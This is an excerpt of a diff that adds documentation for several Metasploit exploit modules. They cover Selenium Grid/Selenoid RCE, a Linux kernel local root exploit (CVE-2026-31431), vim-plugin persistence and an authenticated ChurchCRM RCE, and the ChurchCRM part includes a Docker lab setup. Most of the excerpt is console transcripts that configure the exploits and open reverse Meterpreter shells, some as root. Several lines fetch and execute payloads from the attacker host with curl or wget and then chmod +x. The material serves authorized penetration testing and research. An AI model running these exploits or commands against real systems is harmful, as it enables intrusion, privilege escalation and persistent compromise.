+4. Do: `set RHOSTS <rhost>`
+5. Do: `set LHOST <lhost>`
+6. Do: `run`
+7. You should get a session
+
+## Options
+
+### BROWSER
+
+Browser to exploit. Default is `auto` which detects available browsers and picks the
+best vector (Firefox preferred, Chrome fallback). Can be set to `firefox` or `chrome`
+to force a specific browser.
+
+## Scenarios
+
+### Firefox (auto-detected) - selenium/standalone-firefox:4.40.0 on Ubuntu 24.04
+
+```
+msf6 > use exploit/linux/http/selenium_greed_rce
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4480
+LPORT => 4480
+msf6 exploit(linux/http/selenium_greed_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/selenium_greed_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/selenium_greed_rce) > set FETCH_SRVPORT 9100
+FETCH_SRVPORT => 9100
+msf6 exploit(linux/http/selenium_greed_rce) > run
+[*] Started reverse TCP handler on 172.17.0.1:4480
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Selenium Grid 4.40.0 with Firefox (all versions vulnerable to profile handler)
+[*] Auto-selected Firefox (profile handler - works on all Grid versions)
+[*] Creating Firefox session with malicious profile...
+[*] Session created: 74d019ac-e7eb-4604-9c48-80baf43da5d9
+[*] Navigating to data: URI to trigger handler...
+[*] Sending stage (3090404 bytes) to 172.17.0.5
+[+] Deleted /tmp/EUeiCPJfsLF
+[*] Meterpreter session 1 opened (172.17.0.1:4480 -> 172.17.0.5:37004)
+
+meterpreter > getuid
+Server username: seluser
+meterpreter > sysinfo
+Computer     : 56a95484dc83
+OS           : Linux 6.14.0-123037-tuxedo
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### Chrome (auto-detected) - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04
+
+```
+msf6 > use exploit/linux/http/selenium_greed_rce
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4481
+LPORT => 4481
+msf6 exploit(linux/http/selenium_greed_rce) > run
+[*] Started reverse TCP handler on 172.17.0.1:4481
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Selenium Grid 4.10.0 with Chrome (vulnerable to binary override)
+[*] Auto-selected Chrome (binary override)
+[*] Sending Chrome session request with binary override...
+[*] Sending stage (23404 bytes) to 172.17.0.7
+[*] Meterpreter session 1 opened (172.17.0.1:4481 -> 172.17.0.7:50292)
+
+meterpreter > getuid
+Server username: seluser
+meterpreter > sysinfo
+Computer     : 90f5a4eefae5
+OS           : Linux 6.14.0-123037-tuxedo
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter >
+```
+
+### Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04
+
+```
+msf6 > use exploit/linux/http/selenium_greed_rce
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4453
+LPORT => 4453
+msf6 exploit(linux/http/selenium_greed_rce) > run
+[*] Started reverse TCP handler on 172.17.0.1:4453
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable)
+[*] Auto-selected Chrome (binary override)
+[*] Sending Chrome session request with binary override...
+[*] Sending stage (23408 bytes) to 172.17.0.10
+[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984)
+
+meterpreter > getuid
+Server username: selenium
+meterpreter > sysinfo
+Computer     : 669a719f93da
+OS           : Linux 6.14.0-123037-tuxedo
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter >
+```

documentation/modules/exploit/linux/local/cve_2026_31431_copy_fail.md

@@ -0,0 +1,80 @@
+## Vulnerable Application
+
+CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the
+AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled
+4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the
+on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local
+privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.
+The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and
+affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.
+
+## Verification Steps
+
+1. Obtain a session on an affected Linux host
+2. Set the PAYLOAD and related datastore options
+3. Run the exploit
+
+## Options
+
+N/A
+
+## Scenarios
+
+### Ubuntu 24.04 x64
+
+```
+msf exploit(multi/ssh/sshexec) > exploit
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] 192.168.159.132:22 - Sending stager...
+[*] Command Stager progress -  46.74% done (402/860 bytes)
+[*] Sending stage (3090404 bytes) to 192.168.159.132
+[*] Meterpreter session 24 opened (192.168.159.128:4444 -> 192.168.159.132:38262) at 2026-04-30 14:50:33 -0400
+[!] Timed out while waiting for command to return
+[*] Command Stager progress - 100.00% done (860/860 bytes)
+
+meterpreter > getuid
+Server username: smcintyre
+meterpreter > sysinfo
+Computer     : ubuntu2404
+OS           : Ubuntu 24.04 (Linux 6.8.0-79-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background 
+[*] Backgrounding session 24...
+msf exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2026_31431_copy_fail 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/local/cve_2026_31431_copy_fail) > set SESSION -1
+SESSION => -1
+msf exploit(linux/local/cve_2026_31431_copy_fail) > set VERBOSE true
+VERBOSE => true
+msf exploit(linux/local/cve_2026_31431_copy_fail) > set LPORT 5555
+LPORT => 5555
+msf exploit(linux/local/cve_2026_31431_copy_fail) > exploit
+[*] Command to run on remote host: curl -so ./JVvusljc http://192.168.159.128:8080/dau8JtEFWcUux21CRy4HUQ;chmod +x ./JVvusljc;./JVvusljc&
+[*] Fetch handler listening on 192.168.159.128:8080
+[*] HTTP server started
+[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
+[*] Started reverse TCP handler on 192.168.159.128:5555 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using 'python3' on the remote target.
+[+] The exploit socket has been created, encryption primitives are available.
+[*] Triggering the vulnerability using Python...
+[+] The target is vulnerable.
+[*] Triggering the vulnerability using Python...
+[*] Client 192.168.159.132 requested /dau8JtEFWcUux21CRy4HUQ
+[*] Sending payload to 192.168.159.132 (curl/8.5.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 192.168.159.132
+[*] Meterpreter session 25 opened (192.168.159.128:5555 -> 192.168.159.132:48976) at 2026-04-30 14:51:18 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : ubuntu2404
+OS           : Ubuntu 24.04 (Linux 6.8.0-79-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

documentation/modules/exploit/linux/persistence/vim_plugin.md

@@ -0,0 +1,99 @@
+## Vulnerable Application
+
+This module creates a VIM Plugin which executes a payload on VIM startup.
+
+## Verification Steps
+
+1. Install the application if needed
+2. Start msfconsole
+3. Get a shell on a linux computer with vim installed
+4. Do: `use exploit/linux/persistence/vim_persistence`
+5. Do: `run`
+6. Start `vim` on the remote computer
+7. You should get a shell.
+
+## Options
+
+### NAME
+
+Name of the extension. Defaults to random.
+
+## Scenarios
+
+### vim 9.1.2141 on Kali 2026.1
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown
+msf exploit(multi/script/web_delivery) >
+[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer     : h00die-kali
+OS           : Debian  (Linux 6.18.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/vim_persistence) > set session 1
+session => 1
+msf exploit(linux/persistence/vim_persistence) > exploit
+[*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
+[*] Started reverse TCP handler on 1.1.1.1:4444
+msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[!] The service is running, but could not be validated. VIM is installed
+[*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc
+```
+
+Open vim
+
+```
+[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
+[*] Sending payload to 1.1.1.1 (curl/8.18.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400
+```

documentation/modules/exploit/multi/http/churchcrm_db_restore_rce.md

@@ -0,0 +1,516 @@
+## Vulnerable Application
+
+ChurchCRM is an open-source, PHP-based CRM designed to help churches manage members, groups, events, and finances.
+
+### Description
+
+This module exploits an authenticated Remote Code Execution (RCE) vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability, tracked as [CVE-2025-68109](https://nvd.nist.gov/vuln/detail/CVE-2025-68109), resides in the database restoration functionnality.
+
+The application fails to properly validate the integrity and format of uploaded backup files during the restoration process. Specifically, even when file is identified as malfomed or invalid, it is still writen to a web-accessible directory.
+
+An autenticated attacker can leverage this behavior to upload a malicious `.htaccess` file to reconfigure the server's directory permissions, followed by a PHP payload. This allow for the execution of arbitrary code under the context of the web server user.
+
+- Project Homepage: https://churchcrm.io/
+- Source Code: https://github.com/ChurchCRM/CRM
+- Vulnerability Reference: https://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77
+
+### Versions tested 
+
+- ChurchCRM 6.2.0 (vulnerable)
+- ChurchCRM 6.1.0 (vulnerable)
+- ChurchCRM 6.0.2 (vulnerable)
+
+### Docker installation
+
+To quickly set up a testing environment for this module, you can use the following Docker configuration. This setup mimics a fresh installation of **ChurchCRM** on an Ubuntu-based LAMP stack and setup the admin user.
+
+- Create a file named `Dockerfile` with the following content:
+
+```Dockerfile
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+ARG DB_NAME=churchcrm
+ARG DB_USER=churchcrm
+ARG DB_PASS=churchcrm_password
+ARG CHURCHCRM_VERSION=6.8.0
+ARG ADMIN_PASS
+
+RUN apt-get update && apt-get install -y software-properties-common \
+    && add-apt-repository ppa:ondrej/php -y \
+    && apt-get update \
+    && apt-get update && apt-get install -y \
+    apache2 mariadb-server mariadb-client php8.4 php-bcmath \
+    php-cli php-curl php-dev php-gd php-intl php-mbstring \
+    php-mysql php-soap php-xml php-zip unzip curl gawk \
+    && apt-get clean
+
+ENV VERSION=${CHURCHCRM_VERSION}
+
+WORKDIR /tmp
+RUN curl -L -o churchcrm.zip https://github.com/ChurchCRM/CRM/releases/download/$VERSION/ChurchCRM-$VERSION.zip \
+    && unzip churchcrm.zip \
+    && mv churchcrm /var/www/html/ \
+    && mkdir -p /var/www/html/churchcrm/Images/Family \
+    && mkdir -p /var/www/html/churchcrm/Images/Person \
+    && chown -R www-data:www-data /var/www/html/churchcrm \
+    && rm churchcrm.zip
+
+RUN printf "file_uploads = On\n\
+allow_url_fopen = On\n\
+short_open_tag = On\n\
+memory_limit = 256M\n\
+upload_max_filesize = 100M\n\
+max_execution_time = 360" > /etc/php/8.4/apache2/conf.d/99-churchcrm.ini
+
+RUN echo '<VirtualHost *:80>\n\
+    DocumentRoot /var/www/html/churchcrm/\n\
+    <Directory /var/www/html/churchcrm/>\n\
+        Options -Indexes +FollowSymLinks\n\
+        AllowOverride All\n\
+        Require all granted\n\
+    </Directory>\n\
+    ErrorLog ${APACHE_LOG_DIR}/error.log\n\
+    CustomLog ${APACHE_LOG_DIR}/access.log combined\n\
+</VirtualHost>' > /etc/apache2/sites-available/churchcrm.conf
+
+RUN a2enmod rewrite && a2dissite 000-default.conf && a2ensite churchcrm.conf
+
+COPY start.sh /start.sh
+RUN sed -i 's/\r$//' /start.sh && chmod +x /start.sh
+
+ENV DB_NAME=${DB_NAME}
+ENV DB_USER=${DB_USER}
+ENV DB_PASS=${DB_PASS}
+ENV ADMIN_PASS=${ADMIN_PASS}
+
+EXPOSE 80
+
+CMD ["/start.sh"]
+```
+
+- Create a file named `docker-compose.yml` in the same directory:
+
+```yaml
+services:
+  churchcrm:
+    build:
+      context: .
+      args:
+        - CHURCHCRM_VERSION=6.2.0
+        - DB_NAME=churchcrm
+        - DB_USER=churchcrm
+        - DB_PASS=churchcrm_password
+        - ADMIN_PASS=AdminPassword123
+    container_name: churchcrm_app
+    image: churchcrm-image:latest
+    ports:
+      - "80:80"
+    volumes:
+      - churchcrm_db_data:/var/lib/mysql
+      - churchcrm_web_data:/var/www/html/churchcrm
+    restart: unless-stopped
+
+volumes:
+  churchcrm_db_data:
+  churchcrm_web_data:
+```
+
+- Create a file named `start.sh` in the same directory too :
+
+```bash
+#!/bin/bash
+
+set -e
+
+service mariadb start
+
+mariadb -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME} DEFAULT CHARACTER SET utf8;"
+mariadb -e "GRANT ALL ON ${DB_NAME}.* TO \"${DB_USER}\"@\"localhost\" IDENTIFIED BY \"${DB_PASS}\";"
+mariadb -e "FLUSH PRIVILEGES;"
+
+BASE_PASSWORD="changeme"
+LOG_URL="http://localhost/session/begin"
+LOG_USERNAME="admin"
+LOG_PASSWORD="$BASE_PASSWORD"
+COOKIE_FILENAME="/tmp/cookie.txt"
+
+function get_cookie() {
+  local cookie_file=$1
+  curl -s "$LOG_URL" \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -L -c "$cookie_file" \
+    --data "User=$LOG_USERNAME&Password=$LOG_PASSWORD" > /dev/null
+}
+
+function get_csrf_token() {
+  local URL=$1
+  local result=$(curl -s -L -b "$COOKIE_FILENAME" "$URL")
+  echo "$result" | grep -oP 'name="csrf_token" value="\K[^"]+'
+}
+
+function change_password() {
+  local URL='http://localhost/v2/user/current/changepassword'
+  local OLD_PASSWORD=$1
+  local NEW_PASSWORD=$2
+  local CSRF=$(get_csrf_token "$URL")
+
+  curl -s "$URL" \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -L -b "$COOKIE_FILENAME" \
+    --data "csrf_token=$CSRF&OldPassword=$OLD_PASSWORD&NewPassword1=$NEW_PASSWORD&NewPassword2=$NEW_PASSWORD&Submit=Save" \
+    > /dev/null
+}
+
+(
+  until curl --output /dev/null --silent --head --fail http://localhost/; do
+    echo "En attente d'Apache..."
+    sleep 2
+  done
+
+  echo "Initialisation du setup ChurchCRM..."
+  curl -s "http://localhost/setup/" -X POST \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -d "DB_SERVER_NAME=localhost&DB_SERVER_PORT=3306&DB_NAME=${DB_NAME}&DB_USER=${DB_USER}&DB_PASSWORD=${DB_PASS}&ROOT_PATH=/&URL=http://localhost/"
+
+  echo "Changement du mot de passe admin..."
+  get_cookie "$COOKIE_FILENAME"
+  change_password "$BASE_PASSWORD" "$ADMIN_PASS"
+
+  rm -f "$COOKIE_FILENAME"
+  echo "Configuration terminée avec succès."
+) &
+
+exec apachectl -D FOREGROUND
+```
+
+Then, run the following command to start the vulnerable application : 
+
+```bash
+docker compose build --build-arg CHURCHCRM_VERSION=VERSION_YOU_WANT --build-arg ADMIN_PASS='CUSTOMPASSWORD' && docker compose up -d
+```
+
+Where 
+- `VERSION_YOU_WANT` is the version of ChurchCRM you want to test. To test the vulnerability, you can use version `6.2.0` which is the version tested in the PoC. 
+- `ADMIN_PASS` is the password of the administrator account. Be aware that this password require a size of at least 6 characters. By default the password is `AdminPassword123`.
+
+Once started, the application will be available at `http://<your-ip>/`.
+
+### Linux installation
+
+If you prefer to set up ChurchCRM on a dedicated Linux host or an LXD container, you can use the official installation script present in the [source code](https://github.com/ChurchCRM/CRM/archive/refs/tags/5.2.0.zip).
+
+> [!WARNING] By default, the installer fetches the latest version of ChurchCRM. To test this specific exploit, you **must** force the script to use the version you want.
+
+For example, if you want to test version `6.2.0`, you can modify the `VERSION` variable in the installation script as follows : 
+
+```shell
+VERSION=$(eval "$VERSION_CMD") #112
+# Become
+VERSION="6.2.0"
+```
+
+The application should also be available at `http://<your-ip>/`. You will need to manualy setup the admin account's password in order to have access to the restore database functionnality.
+
+## Verification step
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/churchcrm_db_restore_rce`
+3. Set the target `RHOSTS` and `RPORT` according to the target Host and the port which ChurchCRM's service is running.
+4. Set your host and port for the reverse shell connection at `LHOST` and `LPORT`.
+5. Set the `TARGETURI` which represent the base path that lead to the ChurchCRM page.
+6. Set the `USERNAME` and `PASSWORD` of the admin account.
+7. Set the target (0 for Linux, 1 for PHP (In-Memory), 2 for PHP (Fetch)).
+8. Set the payload you want to use.
+9. Run the exploit with `run`.
+
+## Scenarios
+
+### Linux target : ChurchCRM 6.2.0 on Ubuntu 22.04 LTS (Docker Image)
+
+```bash
+msf > use exploit/multi/http/churchcrm_db_restore_rce
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
+LHOST => 172.18.0.1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set target 0
+target => 0
+msf exploit(multi/http/churchcrm_db_restore_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME admin
+USERNAME => admin
+msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
+PASSWORD => Password123!
+msf exploit(multi/http/churchcrm_db_restore_rce) > show options
+
+Module options (exploit/multi/http/churchcrm_db_restore_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Password123!     yes       Password for the admin account
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SRVSSL     false            no        Negotiate SSL/TLS for local server connections
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Username for the admin account
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
+                                       all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux/unix Command (CmdStager)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/churchcrm_db_restore_rce) > check
+[*] Found ChurchCRM version: 6.2.0
+[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.2.0 detected via CRM-VERSION header.
+msf exploit(multi/http/churchcrm_db_restore_rce) > run
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Getting the session cookie
+[+] The session cookie has been received
+[*] Uploading the file : .htaccess
+[+] The file have been uploaded successfully
+[*] Uploading the file : basmIMy.php
+[+] The file have been uploaded successfully
+[*] Trying to execute the payload
+[*] Command Stager progress -  59.76% done (499/835 bytes)
+[*] Sending stage (3090404 bytes) to 172.18.0.2
+[+] Deleted .htaccess
+[+] Deleted basmIMy.php
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:58848) at 2026-03-06 09:23:07 +0100
+[*] Command Stager progress - 100.00% done (835/835 bytes)
+[+] Payload successfully executed
+
+meterpreter > getpid
+Current pid: 259
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 01209387574a
+OS           : Ubuntu 22.04 (Linux 6.18.13-arch1-1)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### PHP (In-Memory) target : ChurchCRM 6.0.2 on Ubuntu 22.04 LTS (Docker Image)
+
+```bash
+msf > use exploit/multi/http/churchcrm_db_restore_rce
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
+LHOST => 172.18.0.1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set target 1
+target => 1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME admin
+USERNAME => admin
+msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
+PASSWORD => Password123!
+msf exploit(multi/http/churchcrm_db_restore_rce) > show options
+
+Module options (exploit/multi/http/churchcrm_db_restore_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Password123!     yes       Password for the admin account
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SRVSSL     false            no        Negotiate SSL/TLS for local server connections
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Username for the admin account
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
+                                       all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   PHP (In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/churchcrm_db_restore_rce) > check
+[*] Found ChurchCRM version: 6.0.2
+[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.0.2 detected via CRM-VERSION header.
+msf exploit(multi/http/churchcrm_db_restore_rce) > run
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Getting the session cookie
+[+] The session cookie has been received
+[*] Uploading the file : .htaccess
+[+] The file have been uploaded successfully
+[*] Uploading the file : LQyZQTSxhC.php
+[+] The file have been uploaded successfully
+[*] Trying to execute the payload
+[*] Sending stage (42137 bytes) to 172.18.0.2
+[+] Deleted .htaccess
+[+] Deleted LQyZQTSxhC.php
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:33138) at 2026-03-06 09:49:16 +0100
+[+] Payload successfully executed
+
+meterpreter > getpid
+Current pid: 224
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer        : c03035cd436a
+OS              : Linux c03035cd436a 6.18.13-arch1-1 #1 SMP PREEMPT_DYNAMIC Wed, 25 Feb 2026 23:12:35 +0000 x86_64
+Architecture    : x64
+System Language : C
+Meterpreter     : php/linux
+meterpreter >
+```
+
+
+### PHP (Fetch) target : ChurchCRM 6.1.0 on Ubuntu 22.04 LTS (Docker Image)
+
+```bash
+msf > use exploit/multi/http/churchcrm_db_restore_rce
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
+LHOST => 172.18.0.1
+msf exploit(multi/http/churchcrm_db_restore_rce) > set target 2
+target => 2
+msf exploit(multi/http/churchcrm_db_restore_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME admin
+USERNAME => admin
+msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
+PASSWORD => Password123!
+msf exploit(multi/http/churchcrm_db_restore_rce) > show options
+
+Module options (exploit/multi/http/churchcrm_db_restore_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Password123!     yes       Password for the admin account
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SRVSSL     false            no        Negotiate SSL/TLS for local server connections
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Username for the admin account
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
+                                       all addresses.
